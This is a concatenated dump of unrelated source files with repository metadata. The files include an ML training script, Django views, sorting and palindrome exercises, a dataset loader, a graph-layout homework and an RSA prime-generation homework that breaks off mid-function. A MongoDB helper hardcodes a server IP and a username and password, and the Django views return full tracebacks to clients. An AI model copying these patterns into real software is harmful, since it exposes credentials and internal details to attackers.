for feature_dir in feature_dir_list:
feature_file_name = "%s/%s.npy" % (feature_dir, img_base_name)
if os.path.exists(feature_file_name) and \
os.path.isfile(feature_file_name):
feature = np.load(feature_file_name)
x = np.append(x, feature, axis=0)
if feature_list[j] is None:
feature_list[j] = x
else:
feature_list[j] = np.vstack((feature_list[j], x))
if i % 100 == 0:
logging.info("load feature of %dth %s at dataset %d" % (i, path, j))
train_data_feature = feature_list[0]
validation_data_feature = feature_list[1]
logging.info("load feature done")
logging.info("train_data_feature shape %s" % str(train_data_feature.shape))
logging.info("validation_data_feature shape %s" % str(validation_data_feature.shape))
logging.info("start to train the model")
Project.predict_model.fit(x_train=train_data_feature, y_train=train_y
, x_validation=validation_data_feature, y_validation=validation_y)
logging.info("train the model done")
logging.info("start to do validation")
validation_result = Project.predict_model.predict(validation_data_feature)
report = classification_report(validation_result, validation_y)
logging.info("the validation report:\n %s" % report)
validation_pro = Project.predict_model.predict_proba(validation_x)
logloss_val = log_loss(validation_y, validation_pro)
logging.info("validation logloss is %.3f" % logloss_val)
logging.info("done validation")
logging.info("start predict test data")
predict_result = None
for i, path in enumerate(test_data.image_path_list):
x = np.array([])
img_base_name = os.path.basename(path)
for feature_dir in feature_dir_list:
feature_file_name = "%s/%s.npy" % (feature_dir, img_base_name)
if os.path.exists(feature_file_name) and \
os.path.isfile(feature_file_name):
feature = np.load(feature_file_name)
x = np.append(x, feature, axis=0)
predict = Project.predict_model.predict_proba(x)
if predict_result is None:
predict_result = predict
else:
predict_result = np.vstack((predict_result, predict))
if i % 100 == 0:
logging.info("test image feature of %dth %s" % (i, path))
logging.info("predict test data done")
logging.info("start to generate the final file used to submit")
generate_result_file(test_data.image_path_list, predict_result)
logging.info("generated the final file used to submit")
end_time = datetime.datetime.now()
logging.info('total running time: %.2f second' % (end_time - start_time).seconds)
logging.info('end program---------------------')
| [
"fucus@qq.com"
] | fucus@qq.com |
d1305985f70a0546282da08ce99ff4e125cbf4f5 | 4d7e7dd28bb3401046c958f6152fccc4474b01f6 | /src/NewsRecommendSys/views.py | 5e8d4960ce51987cb0dd750797e90d23d7750f32 | [] | no_license | huazhz/WebPortalCollection | a8bc47933270a09196b268b7de287ce21f1fc322 | c1caa5ab8b010e92da105e5b0513ac2bb7fcfdc8 | refs/heads/master | 2020-04-08T02:34:55.581878 | 2017-12-12T03:56:55 | 2017-12-12T03:56:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,415 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.http import HttpResponse
import os
import json
import re
import time
import traceback
from NewsDB.models import News
from UserDB.views import check_user_cookie
from UserDB.models import *
from NewsRecommendSys.models import *
# 路径准备
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
TMP_DIR = os.path.join(BASE_DIR, 'temp')
# 数据准备
# 功能函数
# 响应函数
def user_recommend(request):
result = {
'retcode': 10000,
'error_msg': '',
}
try:
if not check_user_cookie(request):
result['retcode'] = 403
result['error_msg'] = 'illegal cookies'
return HttpResponse(json.dumps(result), content_type='application/json')
all_data = json.loads(request.body)
p_user_name = request.session.get('user_name')
if p_user_name:
user_recommend_set = UserToRecommendUrl.objects.filter(user_name=p_user_name)
recommend_url_list = list(user_recommend_set.values_list('url', flat=True))
news_set = News.objects.filter(url__in=recommend_url_list)
result['news'] = [news.to_dict() for news in news_set]
result['retcode'] = 0
else:
result['retcode'] = 10001
result['error_msg'] = 'user not found'
except:
print traceback.format_exc()
result['retcode'] = 10010
result['error_msg'] = traceback.format_exc()
return HttpResponse(json.dumps(result), content_type='application/json')
def record(request):
result = {
'retcode': 10000,
'error_msg': '',
}
try:
if not check_user_cookie(request):
result['retcode'] = 403
result['error_msg'] = 'illegal cookies'
return HttpResponse(json.dumps(result), content_type='application/json')
all_data = json.loads(request.body)
p_user_name = request.session.get('user_name')
p_url = all_data['url']
p_title = all_data['title']
p_date = time.strftime('%Y-%m-%d', time.localtime(time.time()))
if p_user_name:
check_news_set = News.objects.filter(url=p_url)
if check_news_set.exists():
check_read_url = UserToReadUrl.objects.filter(url=p_url, user_name=p_user_name)
if not check_read_url.exists():
UserToReadUrl.objects.create(
url=p_url,
user_name=p_user_name
)
check_date_title = UserToDateTitle.objects.filter(title=p_title, user_name=p_user_name, date=p_date)
if not check_date_title.exists():
UserToDateTitle.objects.create(
title=p_title,
user_name=p_user_name,
date=p_date
)
result['retcode'] = 0
else:
result['retcode'] = 10002
result['error_msg'] = 'news not found'
else:
result['retcode'] = 10001
result['error_msg'] = 'user not found'
except:
print traceback.format_exc()
result['retcode'] = 10010
result['error_msg'] = traceback.format_exc()
return HttpResponse(json.dumps(result), content_type='application/json')
| [
"meng277277@gmail.com"
] | meng277277@gmail.com |
bf3f7b583721b3ecf7026781aeb8fe79e19dd324 | 203edf2aa1577cc3af7e7603af787023391bdc0f | /kata/sort/python/insertion_sort.py | 6b64f3078fb63e21398381bb765e9b1a13ba38bf | [] | no_license | 0x1001/Sandbox | 6776ee5a3d46467f070f117889b2b7fce15ffcd6 | 61c8592fbdde229921779055601eeaace73cdb8e | refs/heads/master | 2021-03-12T21:58:35.913975 | 2018-10-19T23:46:46 | 2018-10-19T23:46:46 | 16,882,836 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,261 | py | import unittest
def insertion_sort(list_to_sort):
for idx_range in range(len(list_to_sort)):
for idx in range(idx_range,0,-1):
if list_to_sort[idx - 1] > list_to_sort[idx]:
list_to_sort[idx - 1],list_to_sort[idx] = list_to_sort[idx],list_to_sort[idx - 1]
return list_to_sort
class Test_insertion_sort(unittest.TestCase):
def test_sort_empty(self):
self.assertEqual(insertion_sort([]),[])
def test_sort_one_element(self):
self.assertEqual(insertion_sort([1]),[1])
def test_sort_two_sorted_elements(self):
self.assertEqual(insertion_sort([1,2]),[1,2])
def test_sort_two_unsorted_elements(self):
self.assertEqual(insertion_sort([2,1]),[1,2])
def test_sort_three_unsorted_elements(self):
self.assertEqual(insertion_sort([2,1,3]),[1,2,3])
def test_sort_three_reverse_elements(self):
self.assertEqual(insertion_sort([3,2,1]),[1,2,3])
def test_sort_random_numbers(self):
import random
random_list = [random.randint(0,100) for i in range(1000)]
sorted_list = insertion_sort(random_list[:])
random_list.sort()
self.assertEqual(sorted_list,random_list)
if __name__ == "__main__":
unittest.main() | [
"damian.nowok@gmail.com"
] | damian.nowok@gmail.com |
38c8bf880e63be5f53e704346d9e501f8a47d640 | eb6b322096aee65c8d29debdc66d7334928be1c8 | /check_palindrome.py | 43eeec962ec82db4926410b61941d90fb495d2fe | [] | no_license | Hrishikeshbele/Competitive-Programming_Python | 821128d7317313e23704ad5d9d5c8a4a58e420da | 9bfe9ff084fc10010ba438e1a41c8ea83736366b | refs/heads/master | 2021-06-29T02:50:56.959332 | 2020-12-22T06:34:29 | 2020-12-22T06:34:29 | 189,185,272 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 465 | py | '''
check if given string is pelindrome.
solution idea: iteratively check if last letter and first letter of string are equal if not then return false if yes check of substring
excluding first and last elm and basic condition is if len of str is less than 2 then it should be pelindrome so return true
'''
def ispalindrome(word):
if len(word) < 2:
return True
if word[0] != word[-1]:
return False
return ispalindrome(word[1:-1])
| [
"noreply@github.com"
] | noreply@github.com |
7f2113c67ad293e9a2de887c178963ddd9dadebe | 6f2d672f62add5a5a41ab6560804b856671813ce | /mud/core/signals.py | ab159a1dc167c05a627e44484b6016f4930c6ea5 | [] | no_license | rabbitmq/flying-squirrel-demos | 490d85378ae5e77d464a98cc4b011861604007a5 | d3a3060aaab433d11e225bda3d3e79125753ee7e | refs/heads/master | 2023-06-24T22:25:41.851835 | 2015-02-18T14:23:11 | 2015-02-18T14:23:11 | 1,929,367 | 3 | 3 | null | null | null | null | UTF-8 | Python | false | false | 1,013 | py | import logging
log = logging.getLogger(__name__)
import datetime
import django.dispatch
from . import models
from . import trigger
tick_event = django.dispatch.Signal(providing_args=["curr_time"])
def cleanup_connections(sender, curr_time=None, **kwargs):
t0 = curr_time - datetime.timedelta(seconds = 60)
for conn in models.Connection.objects.filter(modified__lt=t0):
actor = conn.char
log.info(" [*] %s (%s) disconnected", actor, conn.reply_to)
conn.send("Come back to us later.")
conn.send("Disconnected...")
conn.delete()
if actor and not actor.is_npc and actor.connection_set.count() == 0:
# Last connection lost, moving to limbo
actor.render_to_others('to_limbo.txt')
actor.room_id = 1
actor.save()
tick_event.connect(cleanup_connections)
# Load all npc modules.
def load_npc():
for actor in models.Char.objects.filter(is_npc=True):
trigger.action('load', actor=actor)
load_npc()
| [
"marek@rabbitmq.com"
] | marek@rabbitmq.com |
a027e6796b5efd74e8c545ff703576337f976659 | 43d6effb34eaeedcba72b74267699e338874cde4 | /jiayj267/DS.py | eccfea4531c335cf23792dfbc61d140868fb98e7 | [] | no_license | yaxiaojie/BioData | 7d6628db60adb320980201ea079d9d8fe15749bd | c9a5942298f6f9ee448a204c356da9afd8119d8a | refs/heads/master | 2020-05-21T03:53:39.026356 | 2019-05-10T01:53:10 | 2019-05-10T01:53:10 | 185,899,633 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 823 | py | """
Author:Xian Tan
Aim:Storage dictionary type data to Biodata database(for testing)
data:18/1/23
"""
import pymongo
from pymongo import MongoClient
class DataStorage:
def __init__(self, name):
self.name = name
self.path = self._login()
def _login(self):
client = pymongo.MongoClient("59.73.198.168", 27017)
db = client['Biodata']
db.authenticate("Fangxy", "123456")
collection = client['Biodata'][self.name]
return collection
def Storage(self, dic):
return self.path.insert(dic)
"""
You can use this class to test your code
Firstly you can do Storage = DS.DataStorage(Name) Name is your database's name
Then when you get a dic. type data,use Storage.Storage(Name2) Name2 is your data's name
Have fun
"""
| [
"noreply@github.com"
] | noreply@github.com |
ba2562d3ccd2489e74728d05752cdb0c596ab32e | f3182e281435d59a23055bb74594a85daaa957c8 | /venv/module_test01.py | 6f36a42915587cc987080f5ae2f59b9db3d60e81 | [] | no_license | 39004404/pyProject | b42aa9998b0383a9530ba1513d90db33e341a2bd | 972a7074456cac6d0728f626390ab54313399887 | refs/heads/master | 2020-04-11T07:08:14.938126 | 2018-12-13T07:52:31 | 2018-12-13T07:52:31 | 161,602,301 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 126 | py | # -*- encoding:utf-8 -*-
import module_name
print("This is module_test01.py")
print(type(module_name))
print(module_name)
| [
"xiezuom@126.com"
] | xiezuom@126.com |
fb785b48dbc3883bf3983cf9a771dd2f9a6bb328 | 4a44d785d19f23033ec89775c8219a2f8275a4dd | /cride/circles/admin.py | a7031ba8c50be95f1f6624a720fbf3187af1f7ce | [
"MIT"
] | permissive | mdark1001/crideApiRest | d17989dfb650eb799c44c57d87f3e0cec8fc647b | 228efec90d7f1ad8a6766b5a8085dd6bbf49fc8a | refs/heads/main | 2023-04-09T23:27:09.931730 | 2021-04-19T13:46:44 | 2021-04-19T13:46:44 | 357,706,873 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 312 | py | from django.contrib import admin
# Register your models here.
from .models import Circle
@admin.register(Circle)
class CircleAdmin(admin.ModelAdmin):
list_display = ['name', 'is_verified', 'is_public', 'rides_taken', 'rides_offered']
list_filter = ['created', 'is_verified', 'is_public','is_limited']
| [
"miguel.cabrera.app@gmail.com"
] | miguel.cabrera.app@gmail.com |
c3d4e78417f43c5eea54511c6315f097dedbc64f | 5b8829f32459b711c41762200a931195dac7e2ea | /2Año/Complementos de Matematica 1/TPFinal/tp.py | f5af90bc21add0f76f631d5013a582f7c9c4125d | [] | no_license | alejosilvalau/cs-ruffa97 | ee19df9ccef60c40f8ce24d9c35a314ee384285a | d51c884d84a1e63e33e9d92e6c2c5732b5bf16a7 | refs/heads/master | 2023-08-16T15:08:12.126843 | 2020-08-05T04:09:01 | 2020-08-05T04:09:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,300 | py | #! /usr/bin/python
# 6ta Practica Laboratorio
# Complementos Matematicos I
# Ejemplo parseo argumentos
import argparse
import matplotlib.pyplot as plt
import numpy as np
import math
import random
import time
from collections import defaultdict
'''
Parametros de layout:
grafo: tupla que representa nuestro grafo en formato Lista
pos_x: diccionario que tiene como clave los vertices y guarda sus posiciones con respecto al eje x
pos_y: idem pos_x con el eje y
accum_x: diccionario que acumula las fuerzas aplicadas a cada uno de los vertices en direccion horizontal
accum_y: idem accum_x en direccion vertical
w: ancho de la pantalla donde se dibuja el grafo
l: alto de la pantalla donde se dibuja el grafo
g: fuerza de gravedad, genera una atraccion hacia el centro de la pantalla
t: temperatura inicial
p: constante de enfriamiento
iters: cantidad de iteraciones a realizar
verbose: booleano que al estar activado, hace que el programa nos muestre informacion mientas corre
optimize: booleano que al estar activado, hace utilizar un algoritmo optimizado
refresh: Numero de iteraciones entre actualizaciones de pantalla.
0 -> se grafica solo al final.
c1: constante usada para calcular la repulsion entre nodos
c2: constante usada para calcular la atraccion de aristas
k: constante usada para el calculo de las fuerzas, la cual depende de la cantidad de vertices, dada en el paper
columns: constante que representa la cantidad de columnas de la grilla.
rows: constante que representa la cantidad de filas de la grilla.
grid: grilla utlizada para la optimizacion del calculo de la fuerza de repulsion.
squares: diccionario que tiene como clave los vertices y como dato el cuadrante al que corresponde.
'''
class LayoutGraph:
def __init__(self, grafo, g, t, iters, refresh, c1, c2, verbose=False, optimize=False):
# Guardo el grafo
self.grafo = grafo
# Inicializo estado
self.pos_x = defaultdict(lambda :0)
self.pos_y = defaultdict(lambda :0)
self.accum_x = defaultdict(lambda :0)
self.accum_y = defaultdict(lambda :0)
self.w = 1500
self.l = 1500
self.g = g
self.t = t
self.iters = iters
self.verbose = verbose
self.optimize = optimize
self.refresh = refresh
self.c1 = c1
self.c2 = c2
self.k = (math.sqrt((self.w*self.l)/len(self.grafo[0])))
if(self.optimize):
self.columnas = int(self.w/(2*self.k))
self.filas = int(self.l/(2*self.k))
self.cuadrante = self.init_cuadrante()
self.cuadricula = defaultdict(lambda :(0,0))
'''
Toma un mensaje y lo imprime si el modo verbose esta activado
'''
def info(self,msg):
if self.verbose:
print(msg)
def info_accum(self):
vertices=self.grafo[0]
if self.verbose:
print("Acumuladores: ")
for v in vertices:
print("Vertice "+ str(v) + ": accum_x = " + str(self.accum_x[v]) + ": accum_y = " + str(self.accum_y[v]))
print("\n")
def info_pos(self):
vertices=self.grafo[0]
if self.verbose:
print("Posiciones: ")
for v in vertices:
print("Vertice "+ str(v) + ": pos_x = " + str(self.pos_x[v]) + ": pos_y = " + str(self.pos_y[v]))
print("\n")
'''
Inicializa la posicion de los vertices en posiciones aleatorias
'''
def randomize_position(self):
vertices=self.grafo[0]
for n in vertices:
x = random.randint(1,self.w-1)
y = random.randint(1,self.l-1)
self.pos_x[n] = x
self.pos_y[n] = y
'''
Idem randomize_position pero luego de generar las posiciones calcula en q cuadrante
pertence cada vertice
'''
def randomize_position_op(self):
vertices=self.grafo[0]
for n in vertices:
x = random.randint(1,self.w-1)
y = random.randint(1,self.l-1)
self.pos_x[n] = x
self.pos_y[n] = y
sq = self.calc_cuadricula(n)
self.cuadrante[sq].append(n)
self.cuadricula[n] = sq
'''
Pone los acumuladores en 0
'''
def reset_accum(self):
vertices=self.grafo[0]
for n in vertices:
x = random.randint(1,self.w-1)
y = random.randint(1,self.l-1)
self.accum_x[n] = 0
self.accum_y[n] = 0
'''
Calcula la distancia euclidida entre dos puntos
'''
def calc_dist(self,x1,x2,y1,y2):
f = math.sqrt(((x2-x1)**2)+((y2-y1)**2))
return f
'''
Toma dos vertices y devuelve la distancia que los separa
'''
def dist(self,v1,v2):
f = self.calc_dist(self.pos_x[v1],self.pos_x[v2],self.pos_y[v1],self.pos_y[v2])
return f
'''
Divide la pantalla en cuadrantes, segun tamaño y cantidad de vertices
'''
def init_cuadrante(self):
cuadrante = {}
for i in range (self.columnas+1):
for j in range (self.filas+1):
cuadrante[(i,j)]=[]
return cuadrante
'''
Dado un vertice se le asigna ek cuadrante que corresponde
'''
def calc_cuadricula(self, n):
x = int(self.pos_x[n] / (2*self.k))
y = int(self.pos_y[n] / (2*self.k))
return (x,y)
'''
Calcula la fuerza de atraccion de dos vertices unidos por una arista y actualiza
el valor de los acumuladores
'''
def f_attraction(self):
self.info("Calculando fuerzas de atraccion...\n")
vertices=self.grafo[0]
aristas=self.grafo[1]
for (v1,v2) in aristas:
dist = self.dist(v1,v2)
if(dist < 0.5):
continue
mod_fa = (dist**2 / self.k*self.c2)
fx = mod_fa*(self.pos_x[v2] - self.pos_x[v1]) / dist
fy = mod_fa*(self.pos_y[v2] - self.pos_y[v1]) / dist
self.accum_x[v1] += fx
self.accum_y[v1] += fy
self.accum_x[v2] -= fx
self.accum_y[v2] -= fy
self.info_accum()
'''
Para cada vertice calcula el valor de la fuerza de repulsion ejercida a los demas vertices
actualizando el valor de los acumuladores
'''
def f_repulsion(self):
self.info("Calculando fuerzas de repulsion...\n")
vertices=self.grafo[0]
aristas=self.grafo[1]
for n1 in vertices:
for n2 in vertices:
if (n1 == n2):
continue
dist = self.dist(n1,n2)
if(dist<1):
fx = random.randint(-10,10)
fy = random.randint(-10,10)
else:
mod_fr = ((self.k*self.c1)**2 / dist)
fx = mod_fr*(self.pos_x[n2]-self.pos_x[n1]) / dist
fy = mod_fr*(self.pos_y[n2]-self.pos_y[n1]) / dist
self.accum_x[n2] += fx
self.accum_y[n2] += fy
self.info_accum()
'''
Version optimizada del calculo de la fuerza de repulsion para el modo
optimize
'''
def f_repulsion_op(self):
self.info("Calculando fuerzas de repulsion...\n")
vertices=self.grafo[0]
aristas=self.grafo[1]
for n1 in vertices:
sq = self.cuadricula[n1]
self.cuadrante[sq].remove(n1)
inix = max(sq[0]-1, 0)
endx = min(sq[0]+1, self.columnas)
iniy = max(sq[1]-1, 0)
endy = min(sq[1]+1, self.filas)
for i in range(inix, endx+1):
for j in range(iniy, endy+1):
for n2 in self.cuadrante[(i,j)]:
dist = self.dist(n1, n2)
if (dist<2*self.k):
if(dist<1):
fx = random.randint(-10,10)
fy = random.randint(-10,10)
else:
mod_fr = ((self.k*self.c1) / dist)
fx = mod_fr*(self.pos_x[n2]-self.pos_x[n1]) / dist
fy = mod_fr*(self.pos_y[n2]-self.pos_y[n1]) / dist
self.accum_x[n1] -= fx
self.accum_y[n1] -= fy
self.accum_x[n2] += fx
self.accum_y[n2] += fy
self.info_accum()
'''
Calcula la fuerza de gravedad de atraccion de cada vertice hacia el centro
de la pantalla
'''
def f_gravedad(self):
vertices = self.grafo[0]
for v in vertices:
dist = self.calc_dist(self.pos_x[v], self.w/2, self.pos_y[v], self.l/2)
fx = self.g * (self.w/2 - self.pos_x[v]) / dist
fy = self.g * (self.l/2 - self.pos_y[v]) / dist
self.accum_x[v] += fx
self.accum_y[v] += fy
self.info_accum()
'''
Actualiza las posiciones de los vertices en funcion de las fuerzas calculadas
anteriormente.
El valor maximo de desplazamiento estara condicionado por el valor actual
de la temperatura
'''
def actual_pos(self):
vertices=self.grafo[0]
for v in vertices:
mod = math.sqrt(self.accum_x[v]**2 + self.accum_y[v]**2)
if(mod > self.t):
self.accum_x[v] = (self.accum_x[v] / mod) * self.t
self.accum_y[v] = (self.accum_y[v] / mod) * self.t
self.pos_x[v] = self.pos_x[v] + self.accum_x[v]
if(self.pos_x[v]<1):
self.pos_x[v]=1
if(self.pos_x[v]>(self.w-1)):
self.pos_x[v]=(self.w-1)
self.pos_y[v] = self.pos_y[v] + self.accum_y[v]
if(self.pos_y[v]<1):
self.pos_y[v]=1
if(self.pos_y[v]>(self.l-1)):
self.pos_y[v]=(self.l-1)
self.info_pos()
'''
Idem actual_pos pero luego de actualizar la posicion calcula para cada
vertice su nuevo cuadrante
'''
def actual_pos_op(self):
vertices=self.grafo[0]
for v in vertices:
mod = math.sqrt(self.accum_x[v]**2 + self.accum_y[v]**2)
if(mod > self.t):
self.accum_x[v] = (self.accum_x[v] / mod) * self.t
self.accum_y[v] = (self.accum_y[v] / mod) * self.t
self.pos_x[v] = self.pos_x[v] + self.accum_x[v]
if(self.pos_x[v]<1):
self.pos_x[v]=1
if(self.pos_x[v]>(self.w-1)):
self.pos_x[v]=(self.w-1)
self.pos_y[v] = self.pos_y[v] + self.accum_y[v]
if(self.pos_y[v]<1):
self.pos_y[v]=1
if(self.pos_y[v]>(self.l-1)):
self.pos_y[v]=(self.l-1)
sq = self.calc_cuadricula(v)
self.cuadrante[sq].append(v)
self.cuadricula[v] = sq
self.info_pos()
'''
Disminuye la temperatura en cada step
'''
def actual_temp(self):
self.t = 0.95 * self.t
'''
Ejecuta las funciones definidas anteriormente. Primero resetea los acumuladores, despues
calcula las fuerzas de atraccion repulsion y gravedad y por ultimo actualiza las posicoines
y la temperatura
'''
def step(self, grafico):
self.reset_accum()
self.f_attraction()
self.f_repulsion()
self.f_gravedad()
self.actual_pos()
self.actual_temp()
'''
Idem step, solo que usando las funciones optimizadas.
'''
def step_op(self, grafico):
self.reset_accum()
self.f_attraction()
self.f_repulsion_op()
self.f_gravedad()
self.actual_pos_op()
self.actual_temp()
'''
Grafica el grafo
'''
def ploteo(self):
plt.ion()
for vertice in self.grafo[0]:
plt.scatter(self.pos_x[vertice],self.pos_y[vertice])
for arista in self.grafo[1]:
plt.plot([self.pos_x[arista[0]],self.pos_x[arista[1]]],[self.pos_y[arista[0]],self.pos_y[arista[1]]])
plt.show()
plt.pause(0.01)
plt.clf()
#return gr
'''
Aplica el algortimo y lo muestra en pantalla
'''
def layout(self):
pos = self.randomize_position()
plt.ion()
grafico = self.ploteo()
iniciar_tiempo = time.time()
it = 0
if (self.refresh == 0):
while(self.t > 0.1 and it<self.iters):
self.step(grafico)
it+=1
else:
while(self.t > 0.1 and it<self.iters):
for i in range(self.refresh):
self.step(grafico)
it+=1
if(self.t <= 0.1):
break
self.ploteo()
self.ploteo()
'''
Layout utilizando funciones optimizadas
'''
def layout_op(self):
self.info("Modo optimize activado")
pos = self.randomize_position_op()
plt.ion()
grafico = self.ploteo()
iniciar_tiempo = time.time()
it = 0
if (self.refresh == 0):
while(self.t > 0.1 and it<self.iters):
self.step_op(grafico)
it+=1
else:
while(self.t > 0.1 and it<self.iters):
for i in range(self.refresh):
self.step_op(grafico)
it+=1
if(self.t <= 0.1):
break
self.ploteo()
self.ploteo()
def read_file_graph(file_name):
f = open(file_name, "r")
lines = f.readlines();
q = int(lines[0])
vertices = []
for i in range(q):
v = lines[i+1].split()
vertices.append(str(v[0]))
lines = lines[q+1:]
edges = []
for s in lines:
l = s.split()
edges.append((str(l[0]), str(l[1])))
graph = (vertices, edges)
return graph
def main():
# Definimos los argumentos de linea de comando que aceptamos
parser = argparse.ArgumentParser()
# Verbosidad, opcional, False por defecto
parser.add_argument(
'-v', '--verbose',
action='store_true',
help='Muestra mas informacion al correr el programa'
)
# Cantidad de iteraciones, opcional, 50 por defecto
parser.add_argument(
'--iters',
type=int,
help='Cantidad de iteraciones a efectuar',
default=100
)
# Temperatura inicial
parser.add_argument(
'--t',
type=float,
help='Temperatura inicial',
default=100.0
)
# Archivo del cual leer el grafo
parser.add_argument(
'file_name',
help='Archivo del cual leer el grafo a dibujar'
)
# Gravedad
parser.add_argument(
'--g',
type=float,
help='Gravedad',
default=0.1
)
# c1
parser.add_argument(
'--c1',
type=float,
help='Atraccion',
default=1.0
)
# c2
parser.add_argument(
'--c2',
type=float,
help='Repulsion',
default=2.5
)
# Refresh
parser.add_argument(
'--refresh',
type=int,
help='Cantidad de iteraciones a realizar antes de graficar',
default=5
)
# Optimize
parser.add_argument(
'-o' , '--optimize',
action='store_true',
help='Optimiza el algoritmo.',
)
args = parser.parse_args()
graph = read_file_graph(args.file_name)
# Creamos nuestro objeto LayoutGraph
layout_gr = LayoutGraph(
graph,
iters=args.iters,
g = args.g,
t = args.t,
refresh=args.refresh,
c1 = args.c1,
c2 = args.c2,
verbose=args.verbose,
optimize=args.optimize
)
# Ejecutamos el layout
if(args.optimize):
layout_gr.layout_op()
else:
layout_gr.layout()
return
if __name__ == '__main__':
main()
| [
"noreply@github.com"
] | noreply@github.com |
8011342288f7791808e51d9093256729947985ed | 91a6a9891312142e172c44d13cc5f3ea14b76bd1 | /loader/IDDALoaderNew.py | ac2343501de511d06260a47900a1edac77db2b91 | [] | no_license | akhilgakhar/tSNE_ResNet | b79cca9696121c1f28fd7b6c867044c59faf7a34 | eb0ddea4d77297d41a3ba1d39b5b1067cf99827b | refs/heads/master | 2022-09-07T08:29:44.893538 | 2020-06-01T10:36:44 | 2020-06-01T10:36:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,342 | py | import os
import os.path as osp
import numpy as np
import random
import matplotlib.pyplot as plt
import collections
import torch
import torchvision
from torch.utils import data
from PIL import Image, ImageFile
from .augmentations import *
import imageio
ImageFile.LOAD_TRUNCATED_IMAGES = True
IDDA_DEFAULT_LABEL = 0
class IDDALoaderNew(data.Dataset):
def __init__(self, root, splitting_dir, label=1, max_samples=1000, transform=None, set='train', merge_classes=False):
self.root = root #"/media/tavera/vandal-hd1/IDDA"
self.label = label
self.transform = transform
self.splitting_dirs = splitting_dir
self.files = []
self.img_ids =[]
self.set = set
self.max_images = max_samples #500
for idx, image_id in enumerate(open(self.splitting_dirs)):
self.img_ids += [image_id.strip()]
if idx == self.max_images - 1:
break
print("LEN IMAGES: ")
print(len(self.img_ids))
#print(self.img_ids)
added = 0
# for split in ["train", "trainval", "val"]:
for name in self.img_ids:
if added==0: # < max_samples/2:
img_file = osp.join(self.root, "RGB", name)
else:
img_file = osp.join(self.root, "SemanticRGB", name)
self.files.append({
"img": img_file,
"label": self.label,
"name": name
})
added += 1
# print(self.files)
def get_label_from_image(self, image_id):
for i, scenario in enumerate(self.label_dict):
if scenario in image_id:
return i
def __len__(self):
return len(self.files)
def __getitem__(self, index):
datafiles = self.files[index]
#print(datafiles["img"])
try:
image = Image.open(datafiles["img"]).convert('RGB')
new_width = 1080 #720
new_height = 1920 #1280
image = image.resize((new_width, new_height), Image.ANTIALIAS)
# print(image.size)
except:
print("Error")
label = datafiles["label"]
name = datafiles["name"]
if self.transform is not None:
#print("transforming")
image_new = self.transform(image)
# print(image.size)
return image_new, label, name
if __name__ == '__main__':
dst = GTA5DataSet("./data", is_transform=True)
trainloader = data.DataLoader(dst, batch_size=4)
for i, data in enumerate(trainloader):
imgs, labels = data
if i == 0:
img = torchvision.utils.make_grid(imgs).numpy()
img = np.transpose(img, (1, 2, 0))
img = img[:, :, ::-1]
plt.imshow(img)
plt.show()
| [
"taveraantonio@icloud.com"
] | taveraantonio@icloud.com |
996a203774c48220ada4a1b9bfb99c0225c52bba | abff9601abdd9a326339a58a1d8f08db9d091963 | /hello.py | f4a194b1573b39e7347474c6d3043df9d8d76ac2 | [] | no_license | mvgolom/test-flask | a9d6cdeee9d149952c367ee5aa2cc7b95f351fc0 | 8f789f5340c8374c1ee11b312c7098dc88c63fbb | refs/heads/master | 2021-01-21T20:42:33.955116 | 2017-05-24T09:13:44 | 2017-05-24T09:13:44 | 92,269,128 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 149 | py | from flask import Flask
app = Flask(__name__)
#golom
@app.route("/")
def hello():
return "Hello World!"
if __name__ == "__main__":
app.run() | [
"viniciusgolom@gmail.com"
] | viniciusgolom@gmail.com |
143eab90e1c7f37888f668b3c97386d68781e1ff | 81669e40a61e137f3fd13039c912b0594b530b69 | /HW4/B10532011_高靖雅/Rsa_generate.py | af6c43343a6ad675c96e69b593892b7816a0c739 | [] | no_license | hsingpingwang/Information_Security_Class | 7143e42d140deac2f6616db1d281c7fb76e598f6 | f952fe070aae0f7f4a7775a784cf12fc4237df9c | refs/heads/master | 2020-08-02T21:53:37.721791 | 2020-01-02T14:55:12 | 2020-01-02T14:55:12 | 211,517,550 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,308 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Dec 10 23:19:51 2019
@author: chinya
"""
import random, math, sys
"""
參數: 正整數x 整數指數k optional modulus p
計算: x^k 或是 x^k mod p (p存在時)
"""
def square_and_multiply(x, k, p=None):
b = bin(k).lstrip('0b')
r = 1
for i in b:
r = r**2
if i == '1':
r = r * x
if p:
r %= p
return r
def miller_rabin_primality_test(p, s=5):
# 2 是唯一的偶數且質數
if p == 2:
return True
# 若n是除了2外的偶數,則非質數
if not (p & 1):
return False
# p-1 = 2^u * r
p1 = p - 1
u = 0
r = p1
while r % 2 == 0:
r >>= 1
u += 1
# 若此時 p-1 = 2^u * r holds
assert p-1 == 2**u * r
def witness(a):
# True, 表此時有witness證明p不是質數
# False, 表此時p可能是質數
#用square and multiply 加速計算
z = square_and_multiply(a, r, p)
if z == 1:
return False
for i in range(u):
z = square_and_multiply(a, 2**i * r, p)
if z == p1:
return False
return True
for j in range(s):
a = random.randrange(2, p-2)
if witness(a):
return False
return True
"""
以bitlength n來產生質數,直到產生k個質數後結束
質數測試的數字從隨機開始,測試是用整數
"""
def generate_primes(n=512, k=1):
assert k > 0
assert n > 0 and n < 4096
# follows from the prime number theorem
necessary_steps = math.floor( math.log(2**n) / 2 )
# get n random bits as our first number to test for primality
x = random.getrandbits(n)
primes = []
while k>0:
#呼叫miller rabin test 來測試是否為質數
if miller_rabin_primality_test(x, s=7):
primes.append(x)
k = k-1
x = x+1
return primes
"""
擴展歐幾里得演算法Extended Euclidean Algorithm(EEA)
參數: 正整數a,b 且 a > b
計算: gcd(a,b) = s*a + t*b
Return: ( gcd(a,b), s, t )
參考: https://en.wikibooks.org/wiki/Algorithm_Implementation/Mathematics/Extended_Euclidean_algorithm
"""
def EEA(a, b):
assert a > b, 'a must be larger than b'
